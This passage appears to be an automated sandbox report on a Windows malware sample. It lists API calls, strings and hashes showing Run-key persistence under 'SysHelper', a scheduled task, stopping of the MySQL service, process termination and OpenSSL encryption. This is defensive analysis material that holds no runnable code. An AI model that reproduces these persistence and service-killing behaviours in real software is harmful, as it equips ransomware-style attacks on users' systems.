                                                                                                                            • Opcode ID: 36270333157a22404f63e4f0ad6e4f5f6c4b4709f6f5f8320792fbd73a300d38
                                                                                                                            • Instruction ID: 19a0970708fabc5660774651091c6f38fd2cb1e31a81a68333245c57c46903af
                                                                                                                            • Opcode Fuzzy Hash: 36270333157a22404f63e4f0ad6e4f5f6c4b4709f6f5f8320792fbd73a300d38
                                                                                                                            • Instruction Fuzzy Hash: 18212333108E01ABEB217F64DC56E4FBBE4DF41727B206C29FC84751A2EE219808CB50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • DecodePointer.KERNEL32 ref: 00E57B29
                                                                                                                            • _free.LIBCMT ref: 00E57B42
                                                                                                                              • Part of subcall function 00E50BED: HeapFree.KERNEL32(00000000,00000000,?,00E5507F,00000000,00E5500D,?,00E53F7C,?,00E4E6CC,00000000), ref: 00E50C01
                                                                                                                              • Part of subcall function 00E50BED: GetLastError.KERNEL32(00000000,?,00E5507F,00000000,00E5500D,?,00E53F7C,?,00E4E6CC,00000000,?,?,?,?,?,00EFB3EC), ref: 00E50C13
                                                                                                                            • _free.LIBCMT ref: 00E57B55
                                                                                                                            • _free.LIBCMT ref: 00E57B73
                                                                                                                            • _free.LIBCMT ref: 00E57B85
                                                                                                                            • _free.LIBCMT ref: 00E57B96
                                                                                                                            • _free.LIBCMT ref: 00E57BA1
                                                                                                                            • _free.LIBCMT ref: 00E57BC5
                                                                                                                            • EncodePointer.KERNEL32(012E2590), ref: 00E57BCC
                                                                                                                            • _free.LIBCMT ref: 00E57BE1
                                                                                                                            • _free.LIBCMT ref: 00E57BF7
                                                                                                                            • _free.LIBCMT ref: 00E57C1F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                             • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3064303923-0
                                                                                                                            • Opcode ID: 684c2da7d901e948bbe6202ccabc3e2da6a82e7e3c46685d081d7817111123ce
                                                                                                                            • Instruction ID: 668d2e808fb124097217a24b14bc37da173024a6665b7bbe461eaa0de3fc4cea
                                                                                                                            • Opcode Fuzzy Hash: 684c2da7d901e948bbe6202ccabc3e2da6a82e7e3c46685d081d7817111123ce
                                                                                                                            • Instruction Fuzzy Hash: 532191398086688BE760AF55FC80D1977A5EB1532A3141C3AFF84B7370CB746C99EB90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00E41BB0
                                                                                                                            • CoCreateInstance.OLE32(00EFE908,00000000,00000001,00EFD568,00000000), ref: 00E41BC8
                                                                                                                            • CoUninitialize.OLE32 ref: 00E41BD0
                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00E41C12
                                                                                                                            • SHGetPathFromIDListW.SHELL32(?,?), ref: 00E41C22
                                                                                                                            • lstrcatW.KERNEL32(?,00F30050), ref: 00E41C3A
                                                                                                                            • lstrcatW.KERNEL32(?), ref: 00E41C44
                                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00E41C68
                                                                                                                            • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00E41C7A
                                                                                                                            Strings
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                                                            • String ID: \shell32.dll
                                                                                                                            • API String ID: 679253221-3783449302
                                                                                                                            • Opcode ID: 7b2cc68e27cda030aa8fdf3227ef1856ba176eb78294ddecff1ee9dc2b42aece
                                                                                                                            • Instruction ID: 67f9b67168a8d9abaa2103245f201a880609eef8f058dd793d0199c22667f4fe
                                                                                                                            • Opcode Fuzzy Hash: 7b2cc68e27cda030aa8fdf3227ef1856ba176eb78294ddecff1ee9dc2b42aece
                                                                                                                            • Instruction Fuzzy Hash: 62414E70A4021DAFDB14CBA4DC88FAA7BBCEF84744F1044D9F605EB150D6B0AE85CB60
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00E84B72), ref: 00E849C7
                                                                                                                            • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 00E849D7
                                                                                                                            • GetDesktopWindow.USER32 ref: 00E849FB
                                                                                                                            • GetProcessWindowStation.USER32(?,00E84B72), ref: 00E84A01
                                                                                                                            • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00E84B72), ref: 00E84A1C
                                                                                                                            • GetLastError.KERNEL32(?,00E84B72), ref: 00E84A2A
                                                                                                                            • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00E84B72), ref: 00E84A65
                                                                                                                            • _wcsstr.LIBCMT ref: 00E84A8A
                                                                                                                            Strings
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                            • String ID: Service-0x$_OPENSSL_isservice
                                                                                                                            • API String ID: 2112994598-1672312481
                                                                                                                            • Opcode ID: 0883478c87ac41c32e294489a5c86d77272066cd3581e66e032ddbe11c846eed
                                                                                                                            • Instruction ID: 9a90c1c4c89192ff9af4f0c1d28608e269fd2c1c0969f9e988324550ea4b57ff
                                                                                                                            • Opcode Fuzzy Hash: 0883478c87ac41c32e294489a5c86d77272066cd3581e66e032ddbe11c846eed
                                                                                                                            • Instruction Fuzzy Hash: 5D31C971A401099BDB24EBBAEC46AAE77B8DF84724F2056A5FC1EF71D0EB309904C751
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetStdHandle.KERNEL32(000000F4,00E84C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,00E8480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,00E81D37,00000000,00E3CDAE,00000001,00000001), ref: 00E84AFA
                                                                                                                            • GetFileType.KERNEL32(00000000), ref: 00E84B05
                                                                                                                            • __vfwprintf_p.LIBCMT ref: 00E84B27
                                                                                                                              • Part of subcall function 00E5BDCC: _vfprintf_helper.LIBCMT ref: 00E5BDDF
                                                                                                                            • vswprintf.LIBCMT ref: 00E84B5D
                                                                                                                            • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00E84B7E
                                                                                                                            • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00E84BA2
                                                                                                                            • DeregisterEventSource.ADVAPI32(00000000), ref: 00E84BA9
                                                                                                                            • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00E84BD3
                                                                                                                            Strings
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                                            • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                                            • API String ID: 277090408-1348657634
                                                                                                                            • Opcode ID: 870bd0cc01d267e2f43fe2d0660b4de305a8635dfe129735eda4bcc03c761cc1
                                                                                                                            • Instruction ID: 6483fad02b3cc7cedf08a2788a9282db1d14c258f3f5150d3d340a765918bc10
                                                                                                                            • Opcode Fuzzy Hash: 870bd0cc01d267e2f43fe2d0660b4de305a8635dfe129735eda4bcc03c761cc1
                                                                                                                            • Instruction Fuzzy Hash: C721B371648305AFE730A760CC47FFB77D8EF98701F544829B69DA61D0EAB494488753
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00E42389
                                                                                                                            • _memset.LIBCMT ref: 00E423B6
                                                                                                                            • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 00E423DE
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00E423E7
                                                                                                                            • GetCommandLineW.KERNEL32 ref: 00E423F4
                                                                                                                            • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00E423FF
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 00E4240E
                                                                                                                            • lstrcmpW.KERNEL32(?,?), ref: 00E42422
                                                                                                                            Strings
                                                                                                                            • SysHelper, xrefs: 00E423D6
                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00E4237F
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                                            • API String ID: 122392481-4165002228
                                                                                                                            • Opcode ID: c82de3e090821f11cf55c0fe577acda8ddce92300248ea7ec1b91ff5908e8461
                                                                                                                            • Instruction ID: 8fefef06d4713282bd5ee8a86f97d2bb4bc8bdacdd41815d83a1ae6a25912440
                                                                                                                            • Opcode Fuzzy Hash: c82de3e090821f11cf55c0fe577acda8ddce92300248ea7ec1b91ff5908e8461
                                                                                                                            • Instruction Fuzzy Hash: D111477194020DAFDB10DBA0DC49FEE77BCBB08305F2045A5B609F2150DBB49A98DB50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock_wcscmp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1077091919-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 4104443479-4289949731
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00E3DAEB
                                                                                                                            • CoCreateInstance.OLE32(00F04F6C,00000000,00000001,00F04F3C,?,?,00EFA948,000000FF), ref: 00E3DB0B
                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 00E3DBD6
                                                                                                                            • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,00EFA948,000000FF), ref: 00E3DBE3
                                                                                                                            • _memset.LIBCMT ref: 00E3DC38
                                                                                                                            • CoUninitialize.OLE32 ref: 00E3DC92
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                                            • String ID: --Task$Comment$Time Trigger Task
                                                                                                                            • API String ID: 330603062-1376107329
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00E41A1D
                                                                                                                            • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00E41A32
                                                                                                                            • ControlService.ADVAPI32(00000000,00000001,?), ref: 00E41A46
                                                                                                                            • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00E41A5B
                                                                                                                            • Sleep.KERNEL32(?), ref: 00E41A75
                                                                                                                            • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00E41A80
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00E41A9E
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00E41AA1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                                            • String ID: MYSQL
                                                                                                                            • API String ID: 2359367111-1651825290
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • std::exception::exception.LIBCMT ref: 00E7F27F
                                                                                                                              • Part of subcall function 00E60CFC: std::exception::_Copy_str.LIBCMT ref: 00E60D15
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E7F294
                                                                                                                              • Part of subcall function 00E60ECA: RaiseException.KERNEL32(?,?,00E7F26B,?,?,00000000,?,?,?,?,00E7F26B,?,00F381FC,?), ref: 00E60F1F
                                                                                                                            • std::exception::exception.LIBCMT ref: 00E7F2AD
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E7F2C2
                                                                                                                            • std::regex_error::regex_error.LIBCPMT ref: 00E7F2D4
                                                                                                                              • Part of subcall function 00E7EF74: std::exception::exception.LIBCMT ref: 00E7EF8E
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E7F2E2
                                                                                                                            • std::exception::exception.LIBCMT ref: 00E7F2FB
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E7F310
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                                            • String ID: bad function call
                                                                                                                            • API String ID: 2464034642-3612616537
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00E535B1
                                                                                                                              • Part of subcall function 00E55208: __getptd_noexit.LIBCMT ref: 00E55208
                                                                                                                            • __gmtime64_s.LIBCMT ref: 00E5364A
                                                                                                                            • __gmtime64_s.LIBCMT ref: 00E53680
                                                                                                                            • __gmtime64_s.LIBCMT ref: 00E5369D
                                                                                                                            • __allrem.LIBCMT ref: 00E536F3
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E5370F
                                                                                                                            • __allrem.LIBCMT ref: 00E53726
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E53744
                                                                                                                            • __allrem.LIBCMT ref: 00E5375B
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E53779
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1503770280-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 00E954C8
                                                                                                                            • GetLastError.KERNEL32(?,?,00000000), ref: 00E954D4
                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 00E954F7
                                                                                                                            • GetLastError.KERNEL32(?,?,00000000), ref: 00E95503
                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00E95531
                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 00E9555B
                                                                                                                            • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 00E955F5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                            • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                                            • API String ID: 1717984340-2085858615
                                                                                                                            • Opcode ID: 4d4733c47f7ec155397d3694b663623a7281f5b741754fc0ff1258f6ea49f8ee
                                                                                                                            • Instruction ID: 870fa96241bef83c0f862ef74b73e81d643092b4bb45e4e1e573e9dff9abebb5
                                                                                                                            • Opcode Fuzzy Hash: 4d4733c47f7ec155397d3694b663623a7281f5b741754fc0ff1258f6ea49f8ee
                                                                                                                            • Instruction Fuzzy Hash: F4517B32B80704BBEF216BA09C03FBE77A9EF45711F114026FE05BB1D2DA618905C7A2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00E4244F
                                                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00E42469
                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E424A1
                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000009), ref: 00E424B0
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00E424B7
                                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00E424C1
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00E424CD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                            • String ID: cmd.exe
                                                                                                                            • API String ID: 2696918072-723907552
                                                                                                                            • Opcode ID: c9d87361e7021a713bf8caed409f7d42c6274d2d605654fb45c47ee8f22b7358
                                                                                                                            • Instruction ID: 91e548f360d6a714f737575bd5fda07f56d63bed21594c78424a1f00dda229ef
                                                                                                                            • Opcode Fuzzy Hash: c9d87361e7021a713bf8caed409f7d42c6274d2d605654fb45c47ee8f22b7358
                                                                                                                            • Instruction Fuzzy Hash: 5D0192355012197FE7206BA1BD89FBE767CDF48715F200055FE08F2142EA6489498AB1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(Shell32.dll,75B04E90), ref: 00E3F338
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00E3F353
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                                            • API String ID: 2574300362-2555811374
                                                                                                                            • Opcode ID: 86211538f0e30778fe9ae782c4977a73b9b76b22f50572fce856efdd9e8ce92c
                                                                                                                            • Instruction ID: 2996a98d66a5c3af57b6aa78193b6ada169a6fec803a2abee1c802ff48923caa
                                                                                                                            • Opcode Fuzzy Hash: 86211538f0e30778fe9ae782c4977a73b9b76b22f50572fce856efdd9e8ce92c
                                                                                                                            • Instruction Fuzzy Hash: E7C13A71D01209EBDF00DFA4ED9ABDEBBF5AF14308F205429E805B7151EB75AA18CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _malloc$__except_handler4_fprintf
                                                                                                                            • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                                                            • API String ID: 1783060780-3771355929
                                                                                                                            • Opcode ID: e856ffb1866552a666b4b7da472361965519a5748382a15db252f02c5ed71bdc
                                                                                                                            • Instruction ID: 26b0c8bc955f0d34b4682e1a62c2ea927fc8bd3e48c66f00a94993fb06388e36
                                                                                                                            • Opcode Fuzzy Hash: e856ffb1866552a666b4b7da472361965519a5748382a15db252f02c5ed71bdc
                                                                                                                            • Instruction Fuzzy Hash: 1CA182B1C00249DBEF11EFE4D84ABDEBFB4AF15314F141428E50977292E7B65648CBA2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _strncmp
                                                                                                                            • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                                            • API String ID: 909875538-2908105608
                                                                                                                            • Opcode ID: 4fade79462c507a1b9491f0bf64d1c02af711505d0d9a9bdf513ce534c8b0906
                                                                                                                            • Instruction ID: 0a72e0647f19ddab88525170d2081c11e251486d7a49b788c6da61aa0cb8d7f8
                                                                                                                            • Opcode Fuzzy Hash: 4fade79462c507a1b9491f0bf64d1c02af711505d0d9a9bdf513ce534c8b0906
                                                                                                                            • Instruction Fuzzy Hash: 5B4127A5BC834129FF326539BC03FD677C55B60B28F096461F79CF91C2E68185878292
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • __init_pointers.LIBCMT ref: 00E55141
                                                                                                                              • Part of subcall function 00E57D6C: EncodePointer.KERNEL32(00000000,?,00E55146,00E53FFE,00F37990,00000014), ref: 00E57D6F
                                                                                                                              • Part of subcall function 00E57D6C: __initp_misc_winsig.LIBCMT ref: 00E57D8A
                                                                                                                              • Part of subcall function 00E57D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00E626B3
                                                                                                                              • Part of subcall function 00E57D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00E626C7
                                                                                                                              • Part of subcall function 00E57D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00E626DA
                                                                                                                              • Part of subcall function 00E57D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00E626ED
                                                                                                                              • Part of subcall function 00E57D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00E62700
                                                                                                                              • Part of subcall function 00E57D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00E62713
                                                                                                                              • Part of subcall function 00E57D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00E62726
                                                                                                                              • Part of subcall function 00E57D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00E62739
                                                                                                                              • Part of subcall function 00E57D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00E6274C
                                                                                                                              • Part of subcall function 00E57D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00E6275F
                                                                                                                              • Part of subcall function 00E57D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00E62772
                                                                                                                              • Part of subcall function 00E57D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00E62785
                                                                                                                              • Part of subcall function 00E57D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00E62798
                                                                                                                              • Part of subcall function 00E57D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00E627AB
                                                                                                                              • Part of subcall function 00E57D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00E627BE
                                                                                                                              • Part of subcall function 00E57D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00E627D1
                                                                                                                            • __mtinitlocks.LIBCMT ref: 00E55146
                                                                                                                            • __mtterm.LIBCMT ref: 00E5514F
                                                                                                                              • Part of subcall function 00E551B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00E55154,00E53FFE,00F37990,00000014), ref: 00E58B62
                                                                                                                              • Part of subcall function 00E551B7: _free.LIBCMT ref: 00E58B69
                                                                                                                              • Part of subcall function 00E551B7: DeleteCriticalSection.KERNEL32(00F3AC00,?,?,00E55154,00E53FFE,00F37990,00000014), ref: 00E58B8B
                                                                                                                            • __calloc_crt.LIBCMT ref: 00E55174
                                                                                                                            • __initptd.LIBCMT ref: 00E55196
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00E5519D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmp
